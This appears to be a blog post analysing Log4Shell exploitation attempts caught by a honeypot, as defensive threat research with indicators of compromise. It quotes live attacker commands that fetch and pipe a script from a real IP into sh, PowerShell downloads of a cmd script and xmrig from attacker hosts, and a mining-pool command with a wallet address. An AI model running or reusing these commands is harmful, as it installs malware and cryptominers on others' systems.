Intro
On December 9, 2021 CVE-2021-44228 was disclosed. It is related to the log4j package that is commonly used for Java logging. This is a RCE vulnerability and attacks have been ongoing for a few weeks. I wanted to check out some active exploits and dive into what exactly they are doing. I have created a Github repository and added some of the files found from looking into the attempted exploitation of a honeypot I set up.
Project Github: https://github.com/zcrosman/log4j-malware
Setting up a honeypot
Setting up a honeypot to analyze basic exploitation attempts is extremely simple. I used a honeypot created by MalwareTech that was already set up and easily deployable. I only made a couple of changes to the configuration of the ports and server name. Test of exploitation attempt shows that detection is working
After setting up the honeypot, it becomes a waiting game. Within an hour, the first exploitation attempt came though. For each attempt, the malicious string is added to the four different fields. Attempted exploitation from several fields
Analyzing the attempted exploitation
I pulled the Exploit.class from the host identified above to see what it was doing. There are two main parts to this script. If it is a Linux, host it will download and execute the ‘log’ file. On Windows hosts, the file ‘z.cmd’ and ‘setup_minerocean_miner.bat’ files are downloaded and executed. Full Exploit.class script
Further analysis of Linux explotation
For Linux hosts, the script will download and run ‘log’. This script downloads and attempts to execute three different files.
| (wget -qO - http://51.250.28.5/.l/log | curl http://51.250.28.5/.l/log) | sh |
‘log’ file
Both of the pty files are ELF executables. The ‘pty3’ file is for 64-bit hosts and ‘pty4’ is for 32-bit hosts. Both files were found to be malicious by checking the hash on VirusTotal. Several tools also identified the malware as Tsunami. pty3 VirusTotal analysis pty4 VirusTotal analysis
Additionally, the script downloads and runs the ‘ldm’ file. This is just a bash script that runs on top of the executables. I have added this file to the GitHub repo. Further analysis of Windows exploitation
If the vulnerable host is running a Windows OS, then the commands below are run in Powershell. The first step is downloading a crypto miner and an additional script to start it. Once the miner is set up, a setup script from a public GitHub repository is used to set up the miner.
1
new-object System.Net.WebClient).DownloadFile('http://150.60.139.51:80/wp-content/themes/twentyseventeen/s.cmd'
1
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://68.183.165.105:80/wp-content/themes/twentyseventeen/xmrig64.exe','xmrig.exe')
1
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
1
new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat')
Summary
IOCs
46.105.95[.]220 47.241.208[.]155 51.250.28[.]5 68.183.165[.]105 150.60.139[.]51 192.46.216[.]224
12cedf7cd63208ee8fd9d0359637c46c pty3 fe5177cbcb78d1aaac9e5adbb9928a74 pty4 65009620e1f8ec829801048d8200bfeb ldm.sh 4a9acf6ce16ed6b978648ef9b3eeca2f log 41857b926bb8c47e24317aafbfa8e832 s.cmd a6ef05385cd4f14349562d98b90a39ce Exploit.class